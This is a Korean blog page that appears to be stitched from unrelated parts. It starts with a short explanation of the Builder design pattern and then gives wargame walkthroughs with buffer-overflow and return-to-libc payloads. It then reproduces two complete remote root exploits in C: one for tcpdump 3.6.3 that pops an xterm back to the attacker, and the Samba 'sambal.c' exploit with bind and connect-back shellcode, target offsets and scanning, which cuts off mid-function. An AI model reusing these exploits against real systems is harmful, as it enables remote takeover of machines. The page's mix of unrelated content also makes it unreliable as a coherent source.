2012~Lee sang sup`s Note

출처 : http://99yurina.blog.me/20156605313 

1. 빌더 패턴이란? 

복잡한 객체를 생성하는 방법과 표현하는 방법을 정의하는 클래스를 별도로 분리하여, 서로다른 표현이라도 이를 생성할 수 있는 동일한 절차를 제공 할 수 있도록 하는 패턴...

이라고~ 사전적 정의가 내려져 있다. 

하지만 나만의 방식대로 말하자면, 다양한 클래스로 생성 해야 할 것들을 하나의 클래스로 한방에 생성 하겠음!  이라고 정의하고 싶다. 물론 여기에는 묶을 수 있는 클래스와 묶을 수 없는 클래스를 구분하는 것은 개발자의 몫이다. 

2. 왜?! 빌더 패턴을 사용하는가? 

우선 피자종류에 대한 프로그램을 짠다고 해보자. 토핑과, 맛, 소스,피클양,페퍼로니,사이즈,치즈크러스터 등등 같은 것을 저장해 줘야 하는데, 이를 한클래스에서 다른이름으로 생성해 주면, 생설할때마다 속성값을 지정해 줘야 하는 불편 함이 있다. 그렇다고 다른 클래스로 생성하여 그것을 미리 설정 해 놓자니, 클래스를 재사용 하기에 불편함이 생긴다.

이 두가지 문제를 해결 하기 위한 것이 빌더 패턴이다.

즉!! 각각의 피자의 속성값을 생성 할때부터 미리 정해 놓을 수 있는데, 같은 객체타입으로 다룰수 있다는 것이다. 

이는 유지보수 면에서 엄청난 매리트다. 

3. 코드 예시 (출처 wikipedia_)

위 그림을 보면, PizzaBuilder 라는 객체를 hawaiian_pizza 와 spicy_pizza 로 각각 생성해 주는데, 이를 new PizzaBuilder 로 선언해 주는 것이 아니라, 그림의 2번 처럼 각각의 hawaiian_pizza 와 spicy_pizza 로 생성한 객체를  각각의 타입이 아닌 pizzaBuilder 타입으로 넣는다!. 

이해를 돕기 위해 PizzaBuilder 추상클래스를 보면, 그림의 1번에서 처럼 pizza 객체를 생성하고, 각각의 메소드를 구현해 놓았다. 그리고 각각의 추상클래스로 builderSource, BuildTopping 등의 추상메소드를 구현해 놓는다.

이제 이러한 PizzaBuilder 를 상속 받아 다양한 피자 객체들을 만들면 PizzaBuilder 에는 이미 피자 객체가 있기 때문에 각각의 속성 값들을 지정해 가지고 있을 수 있다.

이렇게 생성된 다른 객체는 같은 객체로 다뤄질 수 있게 되는 것이다. 

4.느낀점 

 프로그래밍을 오래 한 편이 아니기에 클래스를 선언하고 그 안에 들어가는 객체는 같은 이름의 객체로 생성하는 것만 보았었는데, 저런식으로 타입만 맞추어 다양한 클래스를 집어 넣는 경우를 빌더 패턴을 통해 배운 기분이다. 

Fedora 내부의 환경은 1번 게시글 참조. 

페이로드는 다음과 같다.

다음은 strace를 이용한 값을 오류로서 result 에 저장한다. 

[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes `perl -e 'print "a"x268,"\xfe\x82\x04\x08"x2,"\x91\x54\x7a"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa˜ùãþþþ‘Tz

sh-3.00$ id

uid=502(dark_eyes) gid=501(iron_golem) groups=501(iron_golem) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 502

because of you

sh-3.00$

RedHat -> Fedora 로 넘어오면서 바뀌어진 환경

기존에 LOB RedHat 원정대의 경우는 쉘코드를 많이 활용 했었지만, 페도라원정대에서는 RTL 기법을 최대한 활용 하는 방향으로 가야 편하다. 

아래는 페도라의 수문장인 iron_golem 이다. 

정말 다시 돌아온 것같은 느낌의 쉬운 코드.. 간단하게 return adress 의 주소값을 바꿀 수 있는 구조이다. 

페이로드를 그려보면 다음과 같다. 

[buffer = 264 ] [sfp =4 ] [ret =4] [argc =4 ][argv =4 ] 

RET 주소가 bbbb 로 싀워진것을 확인 할 수 있다. 

다음은 RTL 에 쓸 system() 함수의 시작 주소값을 알아 보자.

우선 기본 RTL 공격 페이로드를 봐보자 

그리고 system 함수를 RET에 넣고 시작하여 인자로 쓸 부분을 확인해 보자. 

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu

sh: 9ÛôþFÛôþ: command not found

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu

sh: 9»öþF»öþ: command not found

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu

sh: 9kôþFkôþ: command not found

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$

무언가가 실행 된 것을 볼 수 있으나 지정된 프로그램이나 명령어가 아니므로 command not found 가 뜨고 있다. 

그리고 그 값이 계속 변한다. 이유인 즉 아직 system 함수의 인자로 쓸 값이 Random 한 스택영역에 있기 때문이다.

우리는 이를 해결하기 위해서 스택 영역을 벗어나야 한다. 

그 중 한 방법으로 ret 의 값으로 다시 ret 주소를 넣고, 그 ret주소에는 다시 ret 주소를 넣는 방식을 사용하여 eip를 계속 올려내는 방법이 있다. 

그방법을 써서 고정된 영역으로 인자값을 옴겨 보도록 하겠다.

GDB 의 disass 를 통하여 RET 의 주소값은 0x08048441 이라는 것을 알 수 있고, 이를 이용하여 위에 설명 했던 방식으로 

페이로드를 짜보자.d

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAÀu

sh: ‹Uðƒì‰Á1À…Òt                      eô[^_]ËMè‹@·H‹Žˆ: command not found

Segmentation fault (core dumped)ÿu‹Mä‰

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAÀu

sh: ‹Uðƒì‰Á1À…Òt                      eô[^_]ËMè‹@·H‹Žˆ: command not found

Segmentation fault (core dumped)ÿu‹Mä‰

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`

보면 RET을 두번만 호출 하였는데도 같은 값이 출력 됨을 확인 할 수 있다. 

이녀석들을 전부다 인자로 만들어줘야 하나 이는 너무 길어보이므로 3번 더 RET을 덮어 보겠다. 

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu

sh: íƒ: No such file or directory

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu

sh: íƒ: No such file or directory

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu

sh: íƒ: No such file or directory

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$

/*

 * TCPDUMP 3.6.3 remote root exploit 

 *

 * tested against FreeBSD-4.6

 *

 * By: icesk

 *

 * Greets: meenor, optik, scsiu, stanly

 * flames: ezoons (homo)

 */

#include <stdio.h>

#include <netinet/in.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netdb.h>

#include <arpa/inet.h>

#define ADDR0xbffff248

#define OFFSET 0

#define NUM_ADDR  10

#define NOP 0x90

#define NUM_NOP100

#define RX_CLIENT_INITIATED  1

#define RX_PACKET_TYPE_DATA  1

#define FS_RX_DPORT 7000

#define FS_RX_SPORT 7001

#define AFS_CALL 134

struct rx_header {

  u_int32_t epoch;

  u_int32_t cid;

  u_int32_t callNumber;

  u_int32_t seq;

  u_int32_t serial;

  u_char type;

  u_char flags;

  u_char userStatus;

  u_char securityIndex;

  u_short spare;

  u_short serviceId;

};

char shellcode[] = 

  "\xeb\x57\x5e\xb3\x21\xfe\xcb\x88\x5e\x2c\x88\x5e\x23"

  "\x88\x5e\x1f\x31\xdb\x88\x5e\x07\x46\x46\x88\x5e\x08"

  "\x4e\x4e\x88\x5e\xFF\x89\x5e\xfc\x89\x76\xf0\x8d\x5e"

  "\x08\x89\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x8d\x4e\xf0"

  "\x89\xf3\x8d\x56\xfc\x31\xc0\xb0\x0e\x48\x48\x48\xcd"

  "\x80\x31\xc0\x40\x31\xdb\xcd\x80\xAA\xAA\xAA\xAA\xBB"

  "\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xDD\xDD\xDD\xDD\xe8\xa4"

  "\xff\xff\xff"

  "/bin/shZ-cZ/usr/X11R6/bin/xtermZ-utZ-displayZ";

long resolve(char *name)

{

  struct hostent *hp;

  long ip;

  if ((ip=inet_addr(name))==-1) {

    if ((hp=gethostbyname(name))==NULL) {

      fprintf (stderr,"Can't resolve host name [%s].\n",name);

      exit(-1);

    }

    memcpy(&ip,(hp->h_addr),4);

  }

  return(ip);

}

int

main(int argc, char *argv[])

{

  struct sockaddr_in addr,sin;

  int sock,aux, offset=OFFSET;

  char buffer[4048], *chptr;

  struct rx_header *rxh;

  long int *lptr, return_addr=ADDR;

  fprintf(stderr, "Tcpdump 3.6.3 remote exploit against FreeBSD 4.6\n\n");

  if (argc<3) {

    printf("Usage: %s [host] [display] [offset]\n",argv[0]);

    exit(-1);

  }

  if (argc==4) offset=atoi(argv[3]);

  return_addr+=offset;

  fprintf(stderr,"Using return addr: %#x\n",return_addr);

  addr.sin_family=AF_INET;

  addr.sin_addr.s_addr=resolve(argv[1]);

  addr.sin_port=htons(FS_RX_DPORT);

  if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) {

    perror("socket()");

    exit(-1);

  }

  sin.sin_family=AF_INET;

  sin.sin_addr.s_addr=INADDR_ANY;

  sin.sin_port=htons(FS_RX_SPORT);

  if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {

    perror("bind()");

    exit(-1);

  }

  memset(buffer,0,sizeof(buffer));

  rxh=(struct rx_header *)buffer;

  rxh->type=RX_PACKET_TYPE_DATA;

  rxh->seq=htonl(1);

  rxh->flags=RX_CLIENT_INITIATED;

  lptr=(long int *)(buffer+sizeof(struct rx_header));

  *(lptr++)=htonl(AFS_CALL);

  *(lptr++)=htonl(1);

  *(lptr++)=htonl(2);

  *(lptr++)=htonl(3);

  *(lptr++)=htonl(420);

  chptr=(char *)lptr;

  sprintf(chptr,"1 0\n");

  chptr+=4;

  memset(chptr,'A',120);

  chptr+=120;

  lptr=(long int *)chptr;

  for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;

  chptr=(char *)lptr;

  memset(chptr,NOP,NUM_NOP);

  chptr+=NUM_NOP;

  shellcode[30]=(char)(46+strlen(argv[2]));

  memcpy(chptr,shellcode,strlen(shellcode));

  chptr+=strlen(shellcode);

  memcpy(chptr,argv[2],strlen(argv[2]));

  chptr+=strlen(argv[2]);

  sprintf(chptr," 1\n");

  if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1)

  {

    perror("send()");

    exit(-1);

  }

  fprintf(stderr,"Packet Sent Waiting For Xterm!!!\n\n");

  close(sock);

  return(0);

}

/*           _ ________            _____                        ______

    __ ___ ____       /____.------`    /_______.------.___.----`  ___/____ _______

         _/    \ _   /\   __.  __//   ___/_    ___.  /_\    /_    |     _/

   ___ ._\    . \\  /__  _____/ _    /     \_  |    /__      |   _| slc | _____ _

      - -------\______||--._____\---._______//-|__    //-.___|----._____||

      / \   /

                                                   \/

[*] samba-2.2.8 < remote root exploit                 by eSDee (www.netric.org|be)

    ------------------------------------------------------------------------------

    sambal.c is a remote root exploit for samba 2.2.x and prior that works against 

    Linux (all distros), FreeBSD (4.x, 5.x), NetBSD (1.x) and OpenBSD (2.x, 3.x 

    and 3.2-non exec stack). It has a scan option, so you can easily identify your 

    lost samba boxes on your home WAN...

    It began with the creation of the great buffer.

    Four bytes were written to it to mark the beginning of it.

    Seven bytes were written to store all information.

    And nine, nine bytes were written to the end to assure a long enough buffer.

    For within this buffer, it could harbor all required user input.

    But they were all deceived, for another byte was written.

    Inside the Memory, in the heart of the stack. The user input was long enough

    to write a master byte. To control the entire buffer, and into this byte, the user

    poured his cruelty, his malice and his will to dominate it all!

    One byte to rule them all.... 

    Copyright (c) 2003 Netric Security

    All rights reserved.

    THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED

    WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF

    MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.

[*] The bug

    in /source/smbd/trans2.c on line 250 - function: call_trans2open() :

    namelen = strlen(pname)+1;

    StrnCpy(fname,pname,namelen); 

[*] MyFirstStachelNET(tm) - howto - 

    sambal.c is able to identify samba boxes. It will send a netbios

    name packet to port 137. If the box responds with the mac address

    00-00-00-00-00-00, it's probally running samba.

    [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0

    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)

    --------------------------------------------------------------

    + Scan mode.

    + [192.168.0.3] Samba

    + [192.168.0.10] Windows

    + [192.168.0.20] Windows

    + [192.168.0.21] Samba

    + [192.168.0.30] Windows

    + [192.168.0.31] Samba

    + [192.168.0.33] Windows

    + [192.168.0.35] Windows

    + [192.168.0.36] Windows

    + [192.168.0.37] Windows

    ...

    + [192.168.0.133] Samba

    Great!

    You could now try a preset (-t0 for a list), but most of the 

    time bruteforce will do. The smbd spawns a new process on every 

    connect, so we can bruteforce the return address...

    [esdee@embrace esdee]$ ./sambal -b 0 -v 192.168.0.133

    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)

    --------------------------------------------------------------

    + Verbose mode.

    + Bruteforce mode. (Linux)

    + Using ret: [0xbffffed4]

    + Using ret: [0xbffffda8]

    + Using ret: [0xbffffc7c]

    + Using ret: [0xbffffb50]

    + Using ret: [0xbffffa24]

    + Using ret: [0xbffff8f8]

    + Using ret: [0xbffff7cc]

    + Worked!

    --------------------------------------------------------------

    *** JE MOET JE MUIL HOUWE

    Linux LittleLinux.selwerd.lan 2.4.18-14 #1 Wed Sep 4 11:57:57 EDT 2002 i586 i586 i386 GNU/Linux

    uid=0(root) gid=0(root) groups=99(nobody)

[*] Credits

    lynx, mike, sacrine, the_itch, tozz (for adding targets) 

    no1 (i ripped some parts from a subnet scanner) 

*/

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

#include <netdb.h>

#include <errno.h>

#include <fcntl.h>

#include <signal.h>

#include <string.h>

#include <unistd.h>

#include <sys/select.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <sys/time.h>

#include <sys/wait.h>

#include <netinet/in.h>

#include <arpa/inet.h>

typedef struct {

unsigned char type;

unsigned char flags;

unsigned short length;

} NETBIOS_HEADER;

typedef struct {

unsigned char protocol[4];

unsigned char command;

unsigned short status;

unsigned char reserved;

unsigned char  flags;

unsigned short flags2;

unsigned char  pad[12];

unsigned short tid;

unsigned short pid;

unsigned short uid;

unsigned short mid;

} SMB_HEADER;

int OWNED = 0;

pid_t childs[100];

struct sockaddr_in addr1;

struct sockaddr_in addr2;

char

linux_bindcode[] =

        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"

        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"

        "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"

        "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"

        "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"

        "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"

        "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"

        "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"

        "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"

        "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"

        "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"

        "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"

        "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

char

bsd_bindcode[] =

"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"

"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"

"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"

"\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57"

"\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89"

"\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50"

"\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80"

"\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56"

"\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd"

"\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f"

"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b"

"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"

"\xeb\x9a";

char

linux_connect_back[] =

"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"

"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"

"\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"

"\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"

"\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"

"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"

"\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"

"\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"

"\x01\xcd\x80"; 

char

bsd_connect_back[] =

        "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"

        "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"

        "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"

        "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"

        "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"

        "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"

        "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"

        "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

struct {

        char *type;

        unsigned long ret;

char *shellcode;

int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */

} targets[] = {

{ "samba-2.2.x - Debian 3.0           ", 0xbffffea2, linux_bindcode, 0 },

{ "samba-2.2.x - Gentoo 1.4.x         ", 0xbfffe890, linux_bindcode,    0 },

{ "samba-2.2.x - Mandrake 8.x         ", 0xbffff6a0, linux_bindcode, 0 },

{ "samba-2.2.x - Mandrake 9.0         ", 0xbfffe638, linux_bindcode, 0 },

        { "samba-2.2.x - Redhat 9.0           ", 0xbffff7cc, linux_bindcode,    0 },

        { "samba-2.2.x - Redhat 8.0           ", 0xbffff2f0, linux_bindcode, 0 },

{ "samba-2.2.x - Redhat 7.x           ", 0xbffff310, linux_bindcode, 0 },

{ "samba-2.2.x - Redhat 6.x           ", 0xbffff2f0, linux_bindcode, 0 },

{ "samba-2.2.x - Slackware 9.0        ", 0xbffff574, linux_bindcode, 0 },

{ "samba-2.2.x - Slackware 8.x        ", 0xbffff574, linux_bindcode,    0 },

{ "samba-2.2.x - SuSE 7.x             ", 0xbffffbe6, linux_bindcode,   0 }, 

{ "samba-2.2.x - SuSE 8.x             ", 0xbffff8f8, linux_bindcode,    0 },

{ "samba-2.2.x - FreeBSD 5.0          ", 0xbfbff374, bsd_bindcode,     1 },

{ "samba-2.2.x - FreeBSD 4.x          ", 0xbfbff374, bsd_bindcode, 1 },

{ "samba-2.2.x - NetBSD 1.6           ", 0xbfbfd5d0, bsd_bindcode, 1 },

{ "samba-2.2.x - NetBSD 1.5           ", 0xbfbfd520, bsd_bindcode,      1 },

{ "samba-2.2.x - OpenBSD 3.2          ", 0x00159198, bsd_bindcode, 2 },

{ "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode,      2 },

{ "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode,      2 },

{ "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode,      2 },

        { "Crash (All platforms)              ", 0xbade5dee, linux_bindcode, 0 },

};

void shell();

void usage();

void handler();

int is_samba(char *ip, unsigned long time_out);

int Connect(int fd, char *ip, unsigned int port, unsigned int time_out);

int read_timer(int fd, unsigned int time_out);

int write_timer(int fd, unsigned int time_out);

int start_session(int sock);

int exploit_normal(int sock, unsigned long ret, char *shellcode);

int exploit_openbsd32(int sock, unsigned long ret, char *shellcode);

void 

usage(char *prog)

{

        fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n"

        "-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n"

"-B <step>       bruteforce steps (default = 300)\n"

"-c <ip address> connectback ip address\n"

"-C <max childs> max childs for scan/bruteforce mode (default = 40)\n"

"-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)\n"

"-f              force\n" 

        "-p <port>       port to attack (default = 139)\n"

"-r <ret>        return address\n"

"-s              scan mode (random)\n"

"-S <network>    scan mode\n"

"-t <type>       presets (0 for a list)\n" 

"-v              verbose mode\n\n", prog);

        exit(1);

}

int

is_samba(char *ip, unsigned long time_out)

{

char

nbtname[]= /* netbios name packet */

{

        0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,

        0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,

        0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,

        0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,

        0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,

        0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,

        0x00,0x01

};

        unsigned char recv_buf[1024];

unsigned char *ptr;

int i = 0;

int s = 0;

unsigned int total = 0;

        if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;

if(Connect(s, ip, 137, time_out) == -1) {

close(s);

return -1;

} 

memset(recv_buf, 0x00, sizeof(recv_buf));

if(write_timer(s, time_out) == 1) {

if (write(s, nbtname, sizeof(nbtname)) <= 0) {

  close(s);

return -1;

}

}

if (read_timer(s, time_out) == 1) {

if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {

close(s);

return -1;

}

        ptr = recv_buf + 57;

  total = *(ptr - 1); /* max names */

        while(ptr < recv_buf + sizeof(recv_buf)) {

              ptr += 18;

if (i == total) {

ptr -= 19;

if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&

              *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {

close(s);

return 0;

}

close(s);

return 1;

}

i++;

}

}

close(s);

return -1;

}

int 

Connect(int fd, char *ip, unsigned int port, unsigned int time_out) 

{

/* ripped from no1 */

int                      flags;

int                      select_status;

fd_set                   connect_read, connect_write;

struct timeval           timeout;

int                      getsockopt_length = 0;

int                      getsockopt_error = 0;

struct sockaddr_in       server;

bzero(&server, sizeof(server));

server.sin_family = AF_INET;

inet_pton(AF_INET, ip, &server.sin_addr);

server.sin_port = htons(port);

if((flags = fcntl(fd, F_GETFL, 0)) < 0) {

close(fd);

    return -1;

  }

